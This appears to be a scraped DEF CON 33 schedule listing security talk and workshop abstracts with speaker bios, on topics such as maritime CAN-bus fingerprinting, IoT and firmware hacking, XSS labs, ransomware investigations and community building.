SpeakerBio: Anissa Elias, University of Rhode Island
- ics Calendar file
Maritime vessel controls and operational technology (OT) systems are getting more complex and interconnected. With industry trends aiming to reduce crew, automate tasks, and improve efficiency, these networks are expanding in scale, intricacy, and criticality for vessel operation and maintenance. The standard controller area network (CAN) bus for maritime vessel networks, developed by the National Marine Electronics Association (NMEA), known as NMEA2000. NMEA2000 is an application layer network protocol built on the ISO11783 standard and compatible with automotive SAEJ1939, it uses unique message identifiers known as Parameter Group Number, to define the data within each communication frame. Despite its widespread use, NMEA2000 remains a relatively unexplored domain, particularly in understanding normal versus abnormal network behavior, due to the unavailability of open-source datasets. To address this gap, we constructed a NMEA2000 system consisting of five nodes: GPS/Radar, Wind Speed/Direction sensor, and Multifunction Display. Using this setup, we collected datasets to analyze system behavior and developed deterministic fingerprints for each sensor, establishing a baseline of the normal operating system. We subject the system to controlled attacks to evaluate the accuracy and effectiveness of the fingerprints. This work represents a foundational step towards enhancing security and reliability in maritime OT systems.
SpeakerBio: Dean "TheDini" Macris, CISO at DispelDean Macris is a Connecticut native and pursuing a PhD at the URI. Constantine is a reserve CDR in the Navy, industry expert in OT and network security and CISO at Dispel.
- ics Calendar file
The IoT Pentest Blitz is a fast-paced, hands-on security assessment challenge designed to simulate real-world penetration testing (pentesting) of IoT devices. You can engage in a structured testing process, leveraging various tools and methodologies to uncover vulnerabilities in IoT firmware, hardware, and software components.
This is ideal for security practitioners seeking to refine their IoT pentesting skills in a controlled, competitive setting.
SpeakerBio: Larry Pesce
- ics Calendar file
In this challenge, participants are given an encrypted firmware image for a D-Link access poitn alone with its publicly available GPL release.
The objective is to decrypt the firmware using clues from open source files.
This is a realistic test of practical reverse engineering and firmware analysis skills, with a focus on identifying overlooked assumptions in standard tooling.
- ics Calendar file
AppSec Village is proud to present our DEF CON Contest in partnership with SecDim. Unlike a typical CTF, this contest rewards the players who fix security vulnerabilities. You can choose between secure coding challenges or competing against other players in an Attack & Defence AppSec challenge, where you need to secure your app before being given a chance to hack other players’ apps😈. You can also develop your own AppSec challenge by following the challenge contribution guidelines. All approved challenges will be hosted during AppSec Village @ DEF CON.
There are two categories of winners: - The player with the highest total points by the end of the event (August 10 at noon PDT) - The best-contributed challenge submission
The Award Ceremony will be held at 12:45 PM PDT in the AppSec Village on August 10.
- ics Calendar file
Interested in malware analysis, reverse engineering, or offensive security? You know setting up a dedicated Windows analysis virtual machine is crucial, but manually installing and configuring countless tools is incredibly time-consuming and complex. Attend this 30-minute demo to discover FLARE-VM, the powerful open-source solution from Mandiant (now part of Google Cloud) that automates this entire process. See firsthand how FLARE-VM drastically simplifies the creation of a comprehensive analysis VM packed with essential reversing and malware analysis tools. Learn why having a ready-to-go analysis environment is indispensable for so many technical cybersecurity roles and how FLARE-VM jump-starts your build!
Speakers:Joshua "jstrosch" Stroschein,Elliot ChernofskyJoshua is an experienced malware analyst and reverse engineer and has a passion for sharing his knowledge with others. He is a reverse engineer with the FLARE team at Google, where he focuses on tackling the latest threats. He is an accomplished trainer, providing training at places such as Ring Zero, Black Hat, DEF CON, ToorCon, Hack In The Box, SuriCon, and other public and private venues. He is also an author on Pluralsight, where he publishes content around malware analysis, reverse engineering, and other security related topics.
SpeakerBio: Elliot ChernofskyElliot is a senior reverse engineer on Mandiant's FLARE team. Prior to joining the team, he worked as a software reverse engineer and vulnerability researcher for the Department of Defense. He received his master’s in computer science from Georgia Tech and a bachelor’s in electrical engineering from the University of South Florida. Outside of work he enjoys hiking, ping pong, and searching for the strongest coffee on the planet.
- ics Calendar file
HD Moore and Nicole Schwartz explore what it takes to create and foster robust cybersecurity communities and why we should all get involved in these important initiatives -- now more than ever. HD will share insights from developing the open-source Metasploit Project, drawing parallels with the enduring principles of in-person community building that Nicole and her board members rely upon to grow and sustain The Diana Initiative.
Get strategies for initiating, nurturing, and scaling these vital networks, incorporating inclusive practices, and cultivating sustainable growth. Plus see how you can actively contribute to these communities regardless of your skillset and where you are in your career, and why doing so is critical to building collective and powerful resilience against evolving cyber threats.
Speakers:HD Moore,Nicole "CircuitSwan" SchwartzHD Moore is a pioneer of the cybersecurity industry who has dedicated his career to vulnerability research, network discovery, and software development since the 1990s. He is most recognized for creating Metasploit and is a passionate advocate for open-source software and vulnerability disclosure. HD serves as the CEO and founder of runZero, a provider of cutting-edge attack surface management and exposure management software. Prior to founding runZero, he held leadership positions at Atredis Partners, Rapid7, and BreakingPoint. HD's professional journey began with exploring telephone networks, developing exploits for the Department of Defense, and breaking into financial institutions. When he's not working, he enjoys hacking on weird Go projects, building janky electronics, running in circles, and playing single-player RPGs.
SpeakerBio: Nicole "CircuitSwan" SchwartzNicole Schwartz (a.k.a. CircuitSwan) speaks about Information Security, DevSecOps, Software Supply Chain Security, Agile, Diversity & Inclusion, and Women in Technology. She is the Senior Security Product Manager at ActiveState, the Chair of the Board for the Diana Initiative 501(c)3, Director of BSides Edmonton Information Security Foundation, and an organizer of SkyTalks village at BSidesLV.
- ics Calendar file
The Ham Radio Village is excited to return to DEF CON 33, offering you the opportunity "Access Everything" by gaining you access to the airwaves though free amateur radio license exams! Ham radio has a long history with ham radio operators being considered the original electronic hackers, innovating long before computers, integrated circuits, or even transistors were invented. The Ham Radio Village keeps this spirit alive by providing free ham radio license exams at DEF CON.
In today's world, wireless communication is essential. A fundamental understanding of radio technology is more important than ever. Earning your amateur radio license opens the door to the world of amateur radio, providing you with valuable knowledge of radio frequency (RF) technology. This knowledge can be applied to a wide range of other RF-related topics, including RFID credentials, Wi-Fi, and other wireless communication systems.
Registration is required and can be completed anytime before taking the exam.
Exams are drop-in and you can show up ant anytime during the testing window until 45 minutes before the end of the exam session (to allow ample time for testing, grading, and paperwork).
One registration covers you for the whole weekend -- no need to pick a specific day.
- ics Calendar file
- ics Calendar file
We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.
- ics Calendar file
We know DEF CON and Vegas can be a lot. If you're a friend of Bill W who's looking for a meeting or just a place to collect yourself, DEF CON 33 has you covered. Join us throughout the conference in the Friends of Bill W Community Space in W301.
- ics Calendar file
Create a custom bracelet to wear or trade, each featuring a special bead with a hidden message or symbol of empowerment. This tactile, low-key activity is perfect for starting conversations and forming connections across the community. No crafting experience needed, just good vibes and open hands. Join us during this hour for a WISP bead to add to your bracelet!
- ics Calendar file
Why grind when you can hack? In this walkthrough, we explore how modern LLMs and AI tooling can vibe-code game hacks faster than your buddy speedrunning with Cheat Engine. We’ll break down Windows internals—threads, processes, virtual memory—and show how single-player games expose juicy variables ripe for memory editing. Then we crank it up: for online games, we move beyond static memory shenanigans to modifying protocol handlers, intercepting function calls, and fuzzing inputs to uncover server-side bugs like infinite gold, integer overflows, and teleportation exploits. Who needs skills when your AI sidekick can boost you through memory space and into dev-only zones?
Note: DCGVR Talks are scheduled 1 hour slots, but the actual presentations can be as short as 30 minutes. Please arrive at the start of the hour.
SpeakerBio: ManfredManfred (@_EBFE) has spent the past 20 years reverse engineering and exploiting MMORPGs. He’s dissected the communication protocols of more than 22 well-known online games, bypassed anti-tampering systems, and slipped past software and hardware fingerprinting like it was part of the tutorial. These days, he explores the intersection of security and virtual economies as a security engineer and researcher at [redacted], channeling the same energy he once used to undermine game servers—now powered by CI pipelines and compliance checklists.
- ics Calendar file
Designing embedded systems requires more than just writing software—it demands a new way of thinking. This talk introduces key concepts that set embedded design apart from traditional software development. We’ll explore microcontrollers vs. microprocessors, bare-metal programming vs. using an operating system, controlling peripherals through registers, handling interrupts, communication protocols, and embedded debugging techniques. Whether you're a curious developer or diving into hardware for the first time, this session will give you the foundation to build complex embedded systems with confidence.
SpeakerBio: Ian G. HarrisDr. Ian Harris is a Professor of Computer Science at the University of California, Irvine, where he conducts research at the intersection of hardware security and natural language processing. His work spans secure system design, information flow tracking, and the development of NLP tools for cybersecurity applications. Dr. Harris is also an experienced educator, teaching courses in embedded system design both on campus and online through Coursera, where he reaches a global audience of learners. With a strong background in computer architecture and verification, he is committed to advancing secure and intelligent computing systems through both innovative research and accessible education.
- ics Calendar file
XSS in modern React apps isn't gone, it's just hiding in new places. In this workshop, we'll expose how React createElement can be your way in. We'll walk through several React DOM XSS lab scenarios based on real bug bounty findings from vulnerable applications in the wild. You'll see how untrusted input can make its way from a variety of realistic sources to a React createElement sink, leading to exploitable XSS, even in apps built with frameworks like Next.js. These labs are realistic, grounded in actual bugs, and designed to sharpen your ability to spot and exploit DOM XSS in the kinds of apps bounty hunters hit every day.
SpeakerBio: Nick CopiNick Copi is an AppSec engineer and active bug bounty hunter who regularly submits high signal findings to notable companies. He has a diverse technical background, including building and hosting infrastructure and challenges for a couple dozen capture the flag or other offensive hands-on training lab events. He is a member of the CTBB Full Time Hunter's Guild, and an active contributor to the online bug bounty space, always eager to share interesting ideas around other people's "nearly exploitable bugs" as well as novel attack scenarios. His hobbies include debugging minified JavaScript, grepping Blink source in hopes of discovering magical undocumented behaviors, and doing pull ups on iframe jungle gyms.
- ics Calendar file
This year at Rapid7’s hands-on hardware hacking lab, you’ll dive in deep to gain root access on an IoT.
Using tools like Flashrom and Hexedit, we’ll guid you through dumping SPI flash, modifying firmware dump to force single user mode, and using UART to interact with the target.
Then we’ll rebuild the environment, load drivers, and regain full acess – finishing with modifying the “CORRECT” root password file to take complete control.
- ics Calendar file
In this hands-on workshop, participants will analyze anonymized infostealer logs to uncover the human vulnerabilities that make these attacks successful. Using privacy-preserved datasets, attendees will reverse-engineer victim decision patterns, identify high-value behavioral triggers, and craft precision-targeted attack sequences based on real-world data.
SpeakerBio: Megan SquireDr. Megan Squire is a researcher in cyber threat intelligence at F-Secure, a consumer-facing cybersecurity software company that focuses on scam protection. Her work tracing illicit finance and extremist influence networks has been featured in hundreds of publications including WIRED, the BBC, NPR, and Frontline.
- ics Calendar file
Everyone loves breaking in—but that’s just step 7 out of 10. This session explores what it really takes to run a physical pen test that's not just exciting, but also safe, smart, and worth the money for your company or client. We'll follow the full journey - from breach-focused OSINT and recon, to delivering findings that teams act on. Expect war stories, dumb mistakes, and smart takeaways as you learn how to turn a good break-in into a lasting impact.
SpeakerBio: ShawnToo many security programs bring a clipboard to a gunfight. Shawn helps companies match and defend against the adversary's tactics - no firearms required. As an adversary for hire, Shawn leads physical red teams that test Fortune 100s, government agencies, and critical infrastructure. He started the largest physical red team in Silicone Valley and teaches security risk management and red teaming to cybersecurity graduate students. From fake badges to forged businesses, kidnapping executives to smuggling weapons, he runs ops that find the gaps in physical security before the bad guys do.
- ics Calendar file
In this talk, I’ll share my path from managing a personal NixOS homelab to architecting infrastructure and developer environments for a growing startup. After many false starts and tangled configurations, I found Clan—a powerful framework that transformed how I manage machines, roles, and secrets. With Clan, I've replaced fragmented manual processes with a single source of truth for all my deployments, cutting through the clutter and reclaiming hours of maintenance time.
We’ll look at how Clan makes it easy to keep your infrastructure organized, share reusable configuration modules, handle secrets securely with Clan Vars, and scale NixOS across teams without having to start from scratch each time.
SpeakerBio: Britton RobitzschI'm a senior software engineer focusing on ETL tooling and Infrastructure. I've been nix-pilled for around three years, and slowly infecting all my friends and coworkers. Temporarily based in NYC, more permanently based in Colorado. I'm either on the computer or out in nature, sometimes both at once.
- ics Calendar file
Triage sits at the heart of every successful bug bounty and vulnerability disclosure program, yet it remains one of the most misunderstood and friction-heavy processes in our industry. As platforms scale to handle thousands of reports while maintaining quality and researcher satisfaction, the challenge isn't just operational—it's fundamentally human.
This talk pulls back the curtain on modern triage operations, exploring how leading platforms structure their workflows, train their teams, and balance the competing demands of speed, accuracy, and community trust. We'll dive into the operational realities of scaling triage across diverse programs, the tools and processes that enable consistency, and the communication strategies that turn potential conflicts into collaborative dialogues.
Drawing from real-world experiences, we'll examine how platforms are evolving their approach to handle disagreements constructively, implement fair appeals processes, and gather meaningful feedback from researcher communities. We'll also look ahead to emerging technologies and cultural shifts that promise to reshape how triage operates.
Whether you're building a triage team, managing researcher relationships, or simply trying to understand why that report was closed, this session offers practical insights into creating triage processes that serve both security outcomes and human needs. Because great triage isn't just about finding the right answer—it's about building the trust and transparency that makes our entire ecosystem stronger.
Speakers:Michelle Lopez,Michael "codingo_" Skelton,Inti "intidc" De Ceukelaire,Eddie Rios,Anthony Silva,Jasmin "JR0ch17" LandryHey there hackers! I am a Lead Triager at HackerOne based in Denver. I started my security journey by sending out download links to trojans to unsuspecting users on ICQ. Years later I began poking around internal systems at the companies I worked at. This led to a deeper interest in how easily users can be compromised. Shortly after I went all in on learning all things appsec related. Today I get to see, recreate, assess, and triage your bug bounty reports which range from open redirects to PII disclosure of thousands of customers to novel LLM hacks. I've triaged over 10,000 reports. My advice is to validate your input! Feel free to reach out over LinkedIn.
SpeakerBio: Michael "codingo_" Skelton, BugcrowdInti De Ceukelaire is a Belgian ethical hacker and cybercrime investigator. He currently works as the Chief Hacker Officer at Europe's largest vulnerability disclosure platform Intigriti, a founding member of the Hacker Policy Council. In 2018, Inti won the "Most Valuable Hacker" award at the largest live hacking event in Las Vegas.
With extensive experience in the field of security and ethical hacking, Inti has earned a reputation as a thought leader in the industry. His work and expertise have been featured in a variety of international publications, including the BBC, Wired, The Verge, CNET, Mashable, and New York Magazine. Inti has made global headlines through his security awareness pranks, which have included manipulating the Vatican's website, creating fake news on Donald Trump's Twitter account, and hacking Metallica. Through these high-profile stunts, Inti has drawn attention to the importance of cybersecurity and the need for individuals and organisations to be vigilant about potential threats. As an experienced and engaging speaker, Inti is able to make complex topics accessible to a wide audience. He has spoken at a variety of conferences and events, sharing insights on the latest trends in cybersecurity and offering practical tips to help individuals and organisations protect themselves from potential threats.
He is also a trusted source for media outlets seeking expert commentary on topics related to cybersecurity, hacking and technology.
SpeakerBio: Eddie Rios, SynackBorn and raised in TX, been hacking or breaking things since I was Kid. Got my start in Phreaking because computers were too expensive back then! Been working in the Information Security field since 2013 and have been working for Synack since 2016. I've seen over 15k reports in that time and have been pretty active with researchers from all over the world. Before security I worked as a technician for various companies including Geek Squad. Before my time on in IT I did body piercings or worked in various fields included retail and fast food. All of which helped me understand the importance of helping people to the best of my abilities.
SpeakerBio: Anthony Silva, Customer Success Manager at YesWeHackAnthony Silva is a Customer Success Manager at YesWeHack, where he manages a diverse portfolio of clients -- from startups to international enterprises -- across multiple industries and countries.
He supports organizations in designing, launching, and optimizing their bug bounty, vulnerability disclosure (VDP), and pentest programs, guiding them from initial onboarding through the full lifecycle of their engagements.
Anthony works closely with cross-functional teams, including sales, product, technical experts, triage analysts, and the hacker community, to ensure customer satisfaction and program effectiveness.
Before joining YesWeHack, he gained valuable experience in various technology and consulting companies, where he developed a strong foundation in cybersecurity, project management, and client relations. As an active registered hunter on several platforms, he also brings hands-on insight into offensive security practices.
Based in Paris and originally from Toulouse, Anthony has French, Spanish, and Portuguese roots. He is passionate about technology, geopolitics, science, and video games.
SpeakerBio: Jasmin "JR0ch17" LandryJasmin Landry is a seasoned ethical hacker and full-time bug bounty hunter who has reported hundreds of security vulnerabilities to some of the world’s largest tech companies. After years leading cybersecurity efforts as Senior Director of Information Security at Nasdaq, Jasmin returned to his roots in hacking — now focusing exclusively on uncovering critical bugs through bug bounty platforms. Recognized at multiple live hacking events for top findings, he brings a sharp eye for unexpected issues and a deep understanding of modern attack surfaces. He’s also a co-leader of OWASP Montréal and an active voice in the security research community.
- ics Calendar file
This talk highlights the untold journey of a Black cybersecurity leader navigating the most secure corners of tech—military communications, national defense, and federal compliance. Nykolas Muldrow takes the audience through his lived experiences on Wake Island and Guantanamo Bay, sharing how isolation, racial identity, and high-stakes missions shaped his technical approach and leadership philosophy. Attendees will leave with lessons on building resilience, mastering risk, and leveraging identity to break into rooms not built for us, but needed by us.
SpeakerBio: Nykolas MuldrowNykolas Muldrow is a Cyber Solutions Architect, U.S. Air Force Cybersecurity Instructor, and CEO of CI Solutions Global Inc. With 15+ years in federal contracting and critical infrastructure defense, he specializes in compliance, cybersecurity operations, and leadership development. A doctoral candidate and national speaker, Nykolas is committed to elevating the Black voice in cybersecurity and building resilient pathways to executive tech leadership. His work fuses real-world defense strategy with culturally informed mentorship and innovation.
- ics Calendar file
Learn the basics of game hacking by playing a game that teaches you to hack the game itself to progress through levels.
- ics Calendar file
The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry like Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but the sheer volume and complexity of Sysmon logs often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis all within a single, scriptable environment. Its extensible nature allows one to use it for various scenarios, including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.
Speakers:Monnappa "Monnappa22" K A,Sajan ShettyMonnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
SpeakerBio: Sajan ShettySajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
- ics Calendar file
The rapid growth of cyber threats has made endpoint logging a critical component of modern security operations. Defenders increasingly rely on endpoint telemetry like Sysmon logs to detect and investigate breaches. These logs capture crucial forensic evidence, but the sheer volume and complexity of Sysmon logs often overwhelm analysts and hinder timely and effective analysis. Garuda is an open-source PowerShell framework designed to address this challenge by providing a unified, flexible, and efficient approach to endpoint detection and response using Sysmon events. With advanced filtering capabilities, cross-event correlation, multiple contextual views, precise time-based noise reduction, and support for both remote and offline (EVTX) analysis, Garuda enables security teams to quickly uncover attack chains, investigate incidents, develop detection logic, and perform in-depth malware analysis all within a single, scriptable environment. Its extensible nature allows one to use it for various scenarios, including threat hunting, investigation, anomaly detection, detection engineering, and malware analysis. Garuda can accelerate investigations, improve detection, and provide deep visibility into endpoint activity.
Speakers:Monnappa "Monnappa22" K A,Sajan ShettyMonnappa K A is a Security professional with over 17 years of experience in incident response and investigation. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on threat hunting, investigation, and research of advanced cyber attacks. He is the author of the best-selling book "Learning Malware Analysis." He is a review board member for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Limon Linux sandbox and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community "Cysinfo" (https://www.cysinfo.com). He has conducted training sessions on malware analysis, reverse engineering, and memory forensics at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, FIRST, SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has presented at various security conferences, including Black Hat, FIRST, SEC-T, 4SICS-SCADA/ICS summit, DSCI, National Cyber Defence Summit, and Cysinfo meetings on various topics related to memory forensics, malware analysis, reverse engineering, and rootkit analysis. He has also authored various articles in eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com.
SpeakerBio: Sajan ShettySajan Shetty is a Cyber Security enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, HITB, and his primary fields of interest include machine learning, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
- ics Calendar file
- ics Calendar file
- ics Calendar file
- ics Calendar file
War stories and bad moves from those in the field.
Speakers:Graham Helton,Kevin Clark,Red Team Village Staff,Skyler KnechtGraham Helton is currently a Red Team Specialist at Google specializing in Linux exploitation. Graham posts frequently on his website grahamhelton.com with deep dives on various security related topics. In his free time he likes to pretend like he knows what he’s doing, coffee, and cooking.
SpeakerBio: Kevin Clark, Red Team Instructor at BC SecurityKevin Clark is a Security Consultant with TrustedSec and a Red Team Instructor with BC Security, with a diverse background in software development, penetration testing, and offensive security operations. Kevin specializes in initial access techniques and Active Directory exploitation. He has contributed to open-source projects such as PowerShell Empire and developed custom security toolkits, including Badrats and Ek47. A skilled trainer and speaker, Kevin has delivered talks and conducted training sessions all over the country at cybersecurity conferences, including Black Hat and DEF CON, and authors a cybersecurity blog at https://henpeebin.com/kevin/blog.
SpeakerBio: Red Team Village StaffSkyler is a Senior Security consultant at SpecterOps, where he performs security assessments for Fortune 500 organizations. With over six years of experience, he focuses on initial access research and contributes to the security community through open-source development and conference presentations. Skyler has presented at DEF CON and BSides and actively collaborates on open-source projects such as Messenger, Ek47, Connect, and Metasploit. He also conducts vulnerability research, having discovered multiple zero-day vulnerabilities in enterprise software.
- ics Calendar file
In this talk, the speaker walks through how they used Nix to declare several AI models with full access to their computer in order to climb the Hack The Box (HtB) leaderboard—after being previously hardstuck at the "Hacker" rank while juggling the responsibilities of being a busy dad.
They demonstrate a semi-autonomous workflow where they are (not) automating themselves out of a job. The talk explores the challenge of tackling numerous CTF problems with limited time and shows how the combination of Nix and AI offers a powerful workflow for solving CTFs that often require multiple, isolated testing environments.
Finally, this custom Nix-based setup is compared to more traditional security-focused distros like Kali and AthenaOS. The talk ends by exploring how this approach transfers to real-world offensive security scenarios—pen testing, red teaming, and bug bounty hunting—and how much of it can be practically applied.
SpeakerBio: cooldadhackingRambo has been doing offensive security for almost a decade now. He's okay at it, and has gotten by largely on vibes and personality. In spite of his mediocrity, his current company lets him work side projects that are related to AI and red teaming.
- ics Calendar file
Yaroslav Vasinskyi was sentenced in 2024 to 13 years in U.S. federal prison for his role in the $700M Kaseya ransomware attack. But behind the headlines lies a more human and complex story. Over the past year, threat researcher Jon DiMaggio built a relationship with Vasinskyi, speaking with him regularly by phone and email. Joining him is John Fokker, Head of Threat Intelligence at Trellix and former Dutch cybercrime investigator involved in operations targeting the REvil gang with global law enforcement.
This talk reveals how REvil operated from the inside, what really happened behind the Kaseya attack, and how ego, greed, and betrayal tore the crew apart. The session also provides new information on the group’s leadership, who vanished and remain at large.
This isn’t theory or speculation. It is raw human intelligence, operational insight, and criminal context behind one of the most devastating ransomware attacks in history. It also tells Vasinskyi’s personal journey, revealing the often overlooked human side of ransomware crime.
Coinciding with the next Ransomware Diaries release, this talk exposes the inner workings and unraveling of one of the most infamous ransomware groups of all time. This is not a glorification, it is a reckoning.
References:
Jon DiMaggio is the Chief Security Strategist at Analyst1 and a cybercrime hunter who doesn’t just follow ransomware gangs, he infiltrates them. A former U.S. intelligence analyst with a background in signals intelligence, Jon has spent his career going deep undercover inside some of the world’s most dangerous cybercrime syndicates. In 2024, he embedded himself within the notorious LockBit ransomware gang, gathering intelligence that helped law enforcement take down one of the most prolific cybercriminal operations in history.
His investigative series The Ransomware Diaries exposed LockBit’s inner workings and earned widespread recognition. Jon is the author of The Art of Cyberwarfare (No Starch Press), a two-time SANS Difference Makers Award winner, has appeared on 60 Minutes, and has been featured in The New York Times, Wired, and Bloomberg. He is also a regular speaker at DEFCON, RSA, and other major security conferences. Whether he’s chasing cybercriminals or telling their stories, Jon brings the kind of firsthand insight you only get when you’ve walked into the lion’s den, and walked out.
SpeakerBio: John FokkerAs Head of Threat Intelligence at Trellix and former head of cyber investigations at the Dutch National High Tech Crime Unit, I bring deep technical knowledge and operational experience bridging law enforcement, intelligence, and private sector perspectives. My work has helped coordinate international takedowns of ransomware infrastructure, and I have direct experience investigating REvil and its affiliates at the height of their operations. My contribution complements Jon’s HUMINT narrative with:
• Technical validation of the behind-the-scenes activities discussed in the talk
• Law enforcement and intelligence insights on affiliate operations, infrastructure, and monetization patterns
• An investigative trail linking Revil and GandCrab, through shared TTPs and operational overlaps
Together, our presentation fuses Hacking, CTI, HUMINT and investigative storytelling with forensic rigor, revealing how trust, betrayal, and ego brought down one of the most feared ransomware gangs in the world.
- ics Calendar file
Since our release of the fault-injection attack on the Trezor millions of dollars have been recovered from crypto-wallets - using a simple glitcing attack! However, for a lot of people this is still black magic, and a lot of folks still assume you need expensive equipment to perform the attack. In this demo we will show you how you can hack into the STM32F4 read-out protection - as used in the Trezor attack - with just a couple of dollars of equipment!
Speakers:Fabian "LiveOverflow" Faessler,Moritz "momo" Frenzel,Thomas "stacksmashing" Roth
- ics Calendar file
Glytch is a post-exploitation tool serving as a command-and-control and data exfiltration service. It creates a covert channel through Twitch live streaming platform and lets attackers execute OS commands or exfiltrate data of any kind from the target computer, regardless of whether the computers are connected over a LAN or WAN.
Speakers:Anıl Çelik,Emre OdamanAnil graduated as a computer engineer and is currently an MSc student in information security engineering. He has 5+ years of professional experience and is working as a cyber security engineer at HAVELSAN, primarily focused on red team engagements and purple teaming. He holds 5+ CVEs and has OSCP and OSWP certifications.
SpeakerBio: Emre OdamanGraduated as a Computer Engineer and working as a Cyber Security Engineer at HAVELSAN for the past 3 years, which is a major defense industry company in Türkiye. His main areas of interest are red teaming, network security, OT, IoT & hardware security.
- ics Calendar file
Over the past few years, we've really seen API hacking take off as a field of its own, diverging from typical web app security, but yet parallel to it. Often we point to the amorphous blob that is web security and go: "here you go, now you can be a hacker too", with top 10 lists, write-ups, conference talks and whitepapers smiling as we do. This creates a major challenge for developers who want to test their APIs for security or just people who want to get into API hacking, how on earth do you wade through all the general web security to get to the meat of API hacking, what do you even need to know? This talk is going to break down API hacking from a developer point of view, teaching you everything you need to know about API hacking, from the bugs you can find and to the impact you can cause, to how you can easily test your own work or review your peers. So what are you waiting for join me and go hack yourself!
SpeakerBio: Katie "InsiderPhD" Paxton-Fear, Principal Security Researcher at Traceable by HarnessDr Katie Paxton-Fear is an API security expert and a Security Advocate at Semgrep, in her words: she used to make applications and now she breaks them. A former API developer turned API hacker. She has found vulnerabilities in organizations ranging from the Department of Defense to Verizon, with simple API vulnerabilities. Dr Katie has been a featured expert in the Wall Street Journal, BBC News, ZDNet, The Daily Swig and more. As she shares some of the easy way hackers can exploit APIs and how they get away without a security alert! Dr Katie regularly delivers security training, security research, to some of the largest brands worldwide. She combines easy-to-understand explanations with key technical details that turn security into something everyone can get.
- ics Calendar file
- ics Calendar file
Psychoholics is a group of nerds that love solving puzzles, drinking drinks, and doing escape rooms. We love competing in contests and CTFs, and we also run TFH, Crash&Compile and Dungeons@Defcon. Oh, and we have a Krux. 110001011100001111101 100011100110001101101
- ics Calendar file
Returning for their 8th year, Gothcon invites you to come dance the night away with a line-up of some of the community's best dark dance music DJ's from across the US! Dress however you would like in whatever makes you feel comfortable and happy, and all are welcome.
- ics Calendar file
workshop on GPON network security weakness and different attack use cases on GPON network
SpeakerBio: Akib Sayyed, Founder at Matrix ShellAkib Sayyed is the Founder and Chief Security Consultant of Matrix-Shell Technologies, an India-based telecom-security firm he established in 2014. Recognised industry-wide as a 5G and telecom-signalling security specialist, Akib has spent more than a decade helping mobile-network operators, MVNOs and regulators uncover and remediate vulnerabilities across legacy (2G/3G/4G) and next-generation (5G Core, VoLTE/VoNR/VoWi-Fi) networks. His expertise spans protocol penetration testing (SS7, Diameter, GTP), radio-access assessments and security-automation tooling.
Under Akib’s leadership, Matrix-Shell has grown into India’s first NCCS-designated 5G Core security test lab and holds ISO/IEC 17025 accreditation for its methodology and results. A frequent conference speaker and Black Hat trainer, he also co-organises the Telecom Village community, where he shares latest threat-intel and open-source tools with the wider security ecosystem. linkedin.com
Across consulting engagements, Akib is known for delivering:
Driven by a mission to “secure the core,” Akib continues to advise operators on rolling out resilient 5G infrastructure, mentors the next wave of telecom-security engineers and contributes to global standards bodies shaping the future of mobile-network defence.
- ics Calendar file
Join the founding members of Red Team Village as they share what they’ve learned building a community focused on offensive security education and discuss their evolution from hands-on leaders to mentors and advisors. From starting as a DEF CON village to growing into a 20,000+ member community, the founders will explore the complexities of building a successful community as well as the transition to letting others lead day-to-day operations.
This session covers the practical realities of community building and leadership evolution - managing volunteers, scaling membership, balancing content for different skill levels, and maintaining community culture during growth. The founders will share what worked in running the village operations, handling logistics at scale, and responding to community feedback to continuously improve the experience.
